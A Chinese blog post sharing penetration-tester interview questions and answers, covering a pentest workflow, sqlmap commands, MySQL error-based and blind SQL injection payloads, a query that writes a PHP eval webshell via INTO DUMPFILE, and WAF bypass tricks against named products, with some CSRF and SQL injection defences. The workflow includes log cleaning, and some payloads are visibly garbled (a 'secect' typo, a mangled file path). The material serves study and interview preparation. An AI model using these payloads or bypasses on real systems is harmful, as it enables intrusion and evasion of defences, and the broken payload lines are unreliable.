昨天分享了一套滲透工程師面試題，我冰雪表哥的回覆真的亮瞎了我的雙眼。我覺得我有必要收藏並且再分享一下。

在獲取書面授權的前提下。

1）資訊收集，

1，獲取域名的whois資訊，獲取註冊者郵箱姓名

電話

等。

2，查詢伺服器旁站以及子域名站點，因為主站一般比較難，所以先看看旁站有沒有通用性的cms或者其他

漏洞

。

3，檢視伺服器

作業系統

版本，

web

中介軟體，看看是否存在已知的漏洞，比如IIS，APACHE，NGINX的解析漏洞

4，檢視IP，進行IP地址埠掃描，對響應的埠進行漏洞探測，比如 rsync，心臟出血，

mysql

，ftp，ssh弱口令等。

5，掃描網站目錄結構，看看是否可以遍歷目錄，或者敏感檔案洩漏，比如

php探針

6，google hack 進一步探測網站的資訊，後臺，敏感檔案

2）漏洞掃描

開始檢測漏洞，如XSS，XSRF，sql注入，程式碼執行，命令執行，越權訪問，目錄讀取，任意檔案讀取，下載，檔案包含，

遠端命令執行，弱口令，上傳，編輯器漏洞，暴力破解等

3）漏洞利用

利用以上的方式拿到webshell，或者其他許可權

4）許可權提升

提權伺服器，比如

windows

下mysql的udf提權，serv-u提權，windows低版本的漏洞，如iis6，pr，

巴西烤肉

，

linux

藏牛漏洞，linux核心版本漏洞提權，linux下的mysql system提權以及oracle低許可權提權

5） 日誌清理

6）總結報告及修復方案

sqlmap，怎麼對一個注入點注入？

1）如果是get型號，直接，sqlmap -u “諸如點網址”。

2） 如果是post型諸如點，可以sqlmap -u “注入點網址” –data=”post的引數”

3）如果是cookie，X-Forwarded-For等，可以訪問的時候，用burpsuite抓包，注入處用*號替換，放到檔案裡，然後sqlmap -r “檔案地址”

nmap，掃描的幾種方式

sql

注入的幾種型別？

1）報錯注入

2）bool型注入

3）延時注入

4）寬位元組注入

報錯注入的函式有哪些？

1）

and extractvalue

（1， concat（0x7e，（select @@version），0x7e））】】】————————

2）透過floor報錯 向下取整

3）+

and updatexml

（1， concat（0x7e，（secect @@version），0x7e），1）

4）。geometrycollection（）select * from test where id=1 and geometrycollection（（select * from（select * from（select user（））a）b））；

5）。multipoint（）select * from test where id=1 and multipoint（（select * from（select * from（select user（））a）b））；

6）。polygon（）select * from test where id=1 and polygon（（select * from（select * from（select user（））a）b））；

7）。multipolygon（）select * from test where id=1 and multipolygon（（select * from（select * from（select user（））a）b））；

8）。linestring（）select * from test where id=1 and linestring（（select * from（select * from（select user（））a）b））；

9）。multilinestring（）select * from test where id=1 and multilinestring（（select * from（select * from（select user（））a）b））；

10）。exp（）select * from test where id=1 and exp（~（select * from（select user（））a））；

延時注入如何來判斷？

if（ascii（substr（“hello”， 1， 1））=104， sleep（5）， 1）

盲注和延時注入的共同點？

都是一個字元一個字元的判斷

如何拿一個網站的webshell？

上傳，後臺編輯模板，sql注入寫檔案，命令執行，程式碼執行，

一些已經爆出的cms漏洞，比如dedecms後臺可以直接建立指令碼檔案，wordpress上傳外掛包含指令碼檔案zip壓縮包等

sql注入寫檔案都有哪些函式？

select ‘一句話’ into outfile ‘路徑’

select ‘一句話’ into dumpfile ‘路徑’

select ‘<？php eval（$_POST［1］） ？>’ into dumpfile ‘d：\\wwwroot\

http：//

baidu。com

\nvhack。php’；

如何防止CSRF？

1，驗證referer

2，驗證token

詳細：淺談cnode社群如何防止csrf攻擊 - CNode技術社群

owasp 漏洞都有哪些？

1、SQL注入防護方法：

2、失效的身份認證和會話管理

3、跨站指令碼攻擊XSS

4、直接引用不安全的物件

5、安全配置錯誤

6、敏感資訊洩露

7、缺少功能級的訪問控制

8、跨站請求偽造CSRF

9、使用含有已知漏洞的元件

10、未驗證的重定向和轉發

SQL注入防護方法？

1、使用安全的API

2、對輸入的特殊字元進行

Escape轉義

處理

3、使用白名單來規範化輸入驗證方法

4、對客戶端輸入進行控制，不允許輸入SQL注入相關的特殊字元

5、伺服器端在提交

資料庫

進行SQL查詢之前，對特殊字元進行過濾、轉義、替換、刪除。

程式碼執行，檔案讀取，命令執行的函式都有哪些？

1，程式碼執行：eval，preg_replace+/e，assert，call_user_func，call_user_func_array，create_function

2，檔案讀取：file_get_contents（），highlight_file（），fopen（），read file（），fread（），fgetss（）， fgets（），parse_ini_file（），show_source（），file（）等

3，命令執行：system（）， exec（）， shell_exec（）， passthru（） ，pcntl_exec（）， popen（），proc_open（）

img標籤除了onerror屬性外，還有其他獲取管理員路徑的辦法嗎？

src指定一個遠端的指令碼檔案，獲取referer

img標籤除了onerror屬性外，並且src屬性的字尾名，必須以。jpg結尾，怎麼獲取管理員路徑。

1，遠端伺服器修改apache配置檔案，配置。jpg檔案以php方式來解析

會以php方式來解析

程式碼審計

eval，preg_replace+/e，assert，call_user_func，call_user_func_array，create_function

檔案讀取：file_get_contents（），highlight_file（），fopen（），read file（），fread（），fgetss（）， fgets（），parse_ini_file（），

show_source

（），file（）等

命令執行：system（）， exec（）， shell_exec（）， passthru（） ，pcntl_exec（）， popen（），proc_open（）

繞過walf

1、關鍵字可以用%（只限IIS系列）。比如select，可以sel%e%ct。原理：網路層waf對SEL%E%CT進行url解碼後變成SEL%E%CT，匹配select失敗，而進入

asp。dll

對SEL%E%CT進行url解碼卻變成select。IIS下的asp。dll檔案在對asp檔案後引數串進行url解碼時，會直接過濾掉09-0d（09是tab鍵，0d是回車）、20（空格）、%（後兩個字元有一個不是

十六進位制

）字元。xss也是同理。

2、通殺的，內聯註釋。安全狗不攔截，但是安全寶、加速樂、D盾等，看到/！/就Fack了，所以只限於安全狗。比如：/！select*/

3、編碼。這個方法對waf很有效果，因為一般waf會解碼，但是我們利用這個特點，進行兩次編碼，他解了第一次但不會解第二次，就bypass了。

騰訊waf

、百度waf等等都可以這樣bypass的。

4，繞過策略一：偽造搜尋引擎

早些版本的

安全狗

是有這個漏洞的，就是把User-Agent修改為

搜尋引擎

5，360webscan指令碼存在這個問題，就是判斷是否為admin dede install等目錄，如果是則不做攔截

GET /pen/news。php？id=1 union select user，password from mysql。user

GET /pen/news。php/admin？id=1 union select user，password from mysql。user

GET /pen/admin/。。\news。php？id=1 union select user，password from mysql。user

6，multipart請求繞過，在POST請求中新增一個上傳檔案，繞過了絕大多數WAF。

7，引數繞過，複製引數，id=1&id=1

用一些特殊字元代替空格，比如在mysql中%0a是換行，可以代替空格，這個方法也可以部分繞過最新版本的安全狗，在sqlserver中可以用/**/代替空格

8，內聯註釋，

檔案上傳，複製檔案包一份再加一份

在 form-data；後面增加一定的字元

寬字元注入

寬字元：解 決方法：就是在初始化連線和

字符集

之後，使用SET character_set_client=binary來設定客戶端的字符集是二進位制的。修改Windows下的MySQL配置檔案一般是 my。ini，Linux下的MySQL配置檔案一般是my。cnf，比如：

mysql_query

（“SETcharacter_set_client=binary”）；。character_set_client指定的是SQL語句的編碼，如果設定為 binary，MySQL就以二進位制來執行，這樣寬位元組編碼問題就沒有用武之地了。